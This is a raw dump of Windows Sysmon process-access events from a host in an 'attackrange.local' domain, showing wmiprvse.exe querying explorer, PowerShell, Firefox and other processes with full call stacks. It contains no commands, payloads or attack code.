16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC74492A8DA1978DA79D00EBBE63410C,SHA256=5A63FB4E116A6AC2E9918A18DD6B6F3C5A01F4A234BD6A26248B1A92FD29D80F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|